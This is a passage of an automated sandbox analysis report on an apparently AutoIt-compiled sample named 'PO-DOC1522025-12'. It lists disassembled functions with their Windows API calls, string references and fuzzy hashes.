Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 6ffb399079b4352ae0d7ba4c624829a2701e8db2bb8219eee24450a2a7bd5912
Instruction ID: 8d3825b4b0876f8611d3b2c97a73a09ca374b300fc53517c1e14e3a7d78c48a2
Opcode Fuzzy Hash: 6ffb399079b4352ae0d7ba4c624829a2701e8db2bb8219eee24450a2a7bd5912
Instruction Fuzzy Hash: 95318E76202614BFEB118F54CC8AFEB3FADEF19715F044056FE089A291D6759C90CBA4

Function 001A5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 001A5637
_memcmp.LIBVCRUNTIME ref: 001A5659
_memcmp.LIBVCRUNTIME ref: 001A5671
_memcmp.LIBVCRUNTIME ref: 001A5684
_memcmp.LIBVCRUNTIME ref: 001A569E
_memcmp.LIBVCRUNTIME ref: 001A56B1
_memcmp.LIBVCRUNTIME ref: 001A56C9
_memcmp.LIBVCRUNTIME ref: 001A56E4

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 2fe07dbba7ad236e8eeec37aa864d2012b78e55dd28c9277d265d0652131e568
Instruction ID: 74716c2b8114f227df25b31af76b7b15f0b1c8f80eec01d09a240a0ad510bea9
Opcode Fuzzy Hash: 2fe07dbba7ad236e8eeec37aa864d2012b78e55dd28c9277d265d0652131e568
Instruction Fuzzy Hash: 3421DB69748A0977D71855208E82FFB335FBF323A4F484025FD1A9A781F720EE3181A5

Function 001C4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 001C5007
NULL Pointer assignment, xrefs: 001C502E, 001C5383

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 8ce45eeba7bbcb7bd583747f47a781bbefda65fbee0419128a1c90d8e435046f
Instruction ID: c53a0d67c86415c69087cc13fdb2aea32fb4a0e0d2f11247d832910934612205
Opcode Fuzzy Hash: 8ce45eeba7bbcb7bd583747f47a781bbefda65fbee0419128a1c90d8e435046f
Instruction Fuzzy Hash: EED1B075A0060A9FDF10CF98C885FAEB7B6BF58344F14856DE915AB281D770ED81CB90

Function 00181522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001815CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00181651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001817FB,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001816E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001816FB

Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00181777
__freea.LIBCMT ref: 001817A2
__freea.LIBCMT ref: 001817AE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: e1a09724ebef1f38a29b79038ad0c3a4d16eb5a8024e77a84e636626c5980124
Instruction ID: 53f8a9fdaf598b1d3773d40e01fce10c1fdd68742a462f63e6299ccc2086b91f
Opcode Fuzzy Hash: e1a09724ebef1f38a29b79038ad0c3a4d16eb5a8024e77a84e636626c5980124
Instruction Fuzzy Hash: 1E91C773E00216BADB24AE74CC81AEE7BBDAF59310F184659E905E7141D735DE42CF60

Function 001C4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001C4648
VariantInit.OLEAUT32(?), ref: 001C4749
VariantClear.OLEAUT32(?), ref: 001C4753
VariantClear.OLEAUT32(?), ref: 001C47B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 001C472C
Null Object assignment in FOR..IN loop, xrefs: 001C45D8, 001C4706, 001C47BE

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: c9e8ad0acd72c6f964087cd9b4ff51cc41d6b9df6e3a768569499b163f30e72d
Instruction ID: fc5ac22c939f33a2c64e1c99a576e87f13b81c7fbbc6b0a749abc7d149c4dce0
Opcode Fuzzy Hash: c9e8ad0acd72c6f964087cd9b4ff51cc41d6b9df6e3a768569499b163f30e72d
Instruction Fuzzy Hash: F6919C71A04319ABDF24CFA4C898FAEBBB8EF66710F10855DF505AB281D770D945CBA0

Function 001B1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 001B125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 001B1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001B12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B1430

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 647a479eadf05acc095a95339306ae11946279fdc7e215aadbc2a1881d12095f
Instruction ID: c4fe7d0331b2a9220d723b435ea2f032bdb413b68016efe09b9ef8bb94099db6
Opcode Fuzzy Hash: 647a479eadf05acc095a95339306ae11946279fdc7e215aadbc2a1881d12095f
Instruction Fuzzy Hash: E3910572A00219BFDB00DFA8C8A4BFE77B5FF55315F624469E900EB291D774A941CB90

Function 0015948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 9c89f50c51ff55d98e7f4028c034864708874e4d28d1bcd9de34b8b30e640b17
Instruction ID: 6add2962bbd148e63110789368eb56b361dc978ef82fe989c2b13c1c8fca83dd
Opcode Fuzzy Hash: 9c89f50c51ff55d98e7f4028c034864708874e4d28d1bcd9de34b8b30e640b17
Instruction Fuzzy Hash: 20914971D10219EFCB14CFA9CC84AEEBBB8FF48320F144556E915BB251D378AA55CB60

Function 001C3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001C396B
CharUpperBuffW.USER32(?,?), ref: 001C3A7A
_wcslen.LIBCMT ref: 001C3A8A
VariantClear.OLEAUT32(?), ref: 001C3C1F

Part of subcall function 001B0CDF: VariantInit.OLEAUT32(00000000), ref: 001B0D1F
Part of subcall function 001B0CDF: VariantCopy.OLEAUT32(?,?), ref: 001B0D28
Part of subcall function 001B0CDF: VariantClear.OLEAUT32(?), ref: 001B0D34

Strings

Incorrect Parameter format, xrefs: 001C39A6, 001C3BA1
AUTOIT.ERROR, xrefs: 001C3A80, 001C3A85

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 34297fa05f921f1b8cb802789a10ecd5216fea5c90ca32d6be20c72414d2807e
Instruction ID: 8bd070a31234bf4d48f83115c957d79c745b00f2615bf8e54267e7783fd68c95
Opcode Fuzzy Hash: 34297fa05f921f1b8cb802789a10ecd5216fea5c90ca32d6be20c72414d2807e
Instruction Fuzzy Hash: 71918A75A083059FC704DF28C480A6AB7E4FFA9314F14892EF8999B351DB31EE45CB92

Function 001C4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 001A000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?,?,001A035E), ref: 001A002B
Part of subcall function 001A000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0046
Part of subcall function 001A000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0054
Part of subcall function 001A000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?), ref: 001A0064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001C4C51
_wcslen.LIBCMT ref: 001C4D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001C4DCF
CoTaskMemFree.OLE32(?), ref: 001C4DDA

Strings

NULL Pointer assignment, xrefs: 001C4E23, 001C4E52

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 8b2de5f7b66792d9da824436f93ef1b41b5d8d44f0c0ba6bc97e3f2c60d7a04f
Instruction ID: 5d217f485b885ebc6c52522a58b3b31c5cf02bcdd3947c5d9f444d4c8a5bd60b
Opcode Fuzzy Hash: 8b2de5f7b66792d9da824436f93ef1b41b5d8d44f0c0ba6bc97e3f2c60d7a04f
Instruction Fuzzy Hash: 8D913771D0121DAFDF14DFA4D890EEEB7B8BF28304F10856AE915AB251DB349A44CFA0

Function 001D20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 001D2183
GetMenuItemCount.USER32(00000000), ref: 001D21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001D21DD
_wcslen.LIBCMT ref: 001D2213
GetMenuItemID.USER32(?,?), ref: 001D224D
GetSubMenu.USER32(?,?), ref: 001D225B

Part of subcall function 001A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A3A57
Part of subcall function 001A3A3D: GetCurrentThreadId.KERNEL32 ref: 001A3A5E
Part of subcall function 001A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001A25B3), ref: 001A3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001D22E3

Part of subcall function 001AE97B: Sleep.KERNEL32 ref: 001AE9F3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 92fef21a61a25e3e297979509c2ecdb942bc043371d95f64476d707c03dc20e5
Instruction ID: 44d69e71a542ee60c58171a27f6173b919b669da198e6bec3e22411fc33bc7e7
Opcode Fuzzy Hash: 92fef21a61a25e3e297979509c2ecdb942bc043371d95f64476d707c03dc20e5
Instruction Fuzzy Hash: 40719E35A00215AFCB14DFA8C845AAEB7F1FF68310F15845AE826EB351D735EE41CB90

Function 001AAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001AAEF9
GetKeyboardState.USER32(?), ref: 001AAF0E
SetKeyboardState.USER32(?), ref: 001AAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 001AAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 001AAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 001AAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 001AB020

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 28ceb9a80e26647073a1757fc882646b810f48ebc67ce9139008e9381224d5e3
Instruction ID: 38d35a469efc56924760da17f96b60b43507851256acfe20058a3ec2933f0048
Opcode Fuzzy Hash: 28ceb9a80e26647073a1757fc882646b810f48ebc67ce9139008e9381224d5e3
Instruction Fuzzy Hash: 1E5181A46087D53DFB3A42348C85BBABEA95F07304F08858AF1D9958C3D7A9ACC4D751

Function 001AACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 001AAD19
GetKeyboardState.USER32(?), ref: 001AAD2E
SetKeyboardState.USER32(?), ref: 001AAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001AADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001AADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001AAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001AAE38

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f7311172bb16626a8982aea4d6a19cdae92fef72a87e71b2d99bb23fa6f5002b
Instruction ID: d81f80a58caecf3445e4906ebac908720fc185a647c680b63336ae9f10a2a2a7
Opcode Fuzzy Hash: f7311172bb16626a8982aea4d6a19cdae92fef72a87e71b2d99bb23fa6f5002b
Instruction Fuzzy Hash: CE51E3A55487D53DFB3783748C95BBABEA85F47300F488489E1D5468C3D3A4EC88E762

Function 0017542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00183CD6,?,?,?,?,?,?,?,?,00175BA3,?,?,00183CD6,?,?), ref: 00175470
__fassign.LIBCMT ref: 001754EB
__fassign.LIBCMT ref: 00175506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00183CD6,00000005,00000000,00000000), ref: 0017552C
WriteFile.KERNEL32(?,00183CD6,00000000,00175BA3,00000000,?,?,?,?,?,?,?,?,?,00175BA3,?), ref: 0017554B
WriteFile.KERNEL32(?,?,00000001,00175BA3,00000000,?,?,?,?,?,?,?,?,?,00175BA3,?), ref: 00175584

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6b5c45993f5f2621c874f47a1e718bd0bf23be3e24716d3633a227feeb910bd0
Instruction ID: a42ca37186b2e90a0e20513ada7ef88d654c8a2a57b1f2af5489fca14110fe20
Opcode Fuzzy Hash: 6b5c45993f5f2621c874f47a1e718bd0bf23be3e24716d3633a227feeb910bd0
Instruction Fuzzy Hash: 0851C6719006499FDB10CFA8D885AEEBBFAEF09300F14851AF559E7291E7709A41CB60

Function 00162D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00162D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00162D53
_ValidateLocalCookies.LIBCMT ref: 00162DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00162E0C
_ValidateLocalCookies.LIBCMT ref: 00162E61

Strings

csm, xrefs: 00162DF6

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 2b75e032e8f88fbec625ac0e66f634d498efd7cc6bfd8cc2b62d7007522a88fa
Instruction ID: ae4ef51556ff0a1a82be82e8a2d1c88de12c69344df9d5b8f310616fe4f4a0e4
Opcode Fuzzy Hash: 2b75e032e8f88fbec625ac0e66f634d498efd7cc6bfd8cc2b62d7007522a88fa
Instruction Fuzzy Hash: 4E41D234E00609ABCF10DFA8CC85ADEBBB5BF45324F148165E814AB392D771AA61CBD0

Function 001C10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001C307A
Part of subcall function 001C304E: _wcslen.LIBCMT ref: 001C309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001C1112
WSAGetLastError.WSOCK32 ref: 001C1121
WSAGetLastError.WSOCK32 ref: 001C11C9
closesocket.WSOCK32(00000000), ref: 001C11F9

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 42825b03b3e9bf434311ed2c6ed0d0cae9097ca40383313ad9aa897f3af0e55f
Instruction ID: 0d7787d9cd48ae536eed5d370c86f43810aa1d45ee6715c4d49ca4dbb3880f2a
Opcode Fuzzy Hash: 42825b03b3e9bf434311ed2c6ed0d0cae9097ca40383313ad9aa897f3af0e55f
Instruction Fuzzy Hash: 3141E531601205AFDB109F24C884FA9B7E9FF56324F188159FD159B292C778ED81CBE1

Function 001ACF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ACF22,?), ref: 001ADDFD

Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ACF22,?), ref: 001ADE16

lstrcmpiW.KERNEL32(?,?), ref: 001ACF45
MoveFileW.KERNEL32(?,?), ref: 001ACF7F
_wcslen.LIBCMT ref: 001AD005
_wcslen.LIBCMT ref: 001AD01B
SHFileOperationW.SHELL32(?), ref: 001AD061

Strings

\*.*, xrefs: 001ACFF3

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: e5ec7e1c8d1df9b2f64c7af100e8cbce81fc4b633ab105468de6fbd9f05b65c7
Instruction ID: 22b7972cda2c5b6bb388edaf8f3b1e5f5f87b643644350c1fbae7d8076779d0d
Opcode Fuzzy Hash: e5ec7e1c8d1df9b2f64c7af100e8cbce81fc4b633ab105468de6fbd9f05b65c7
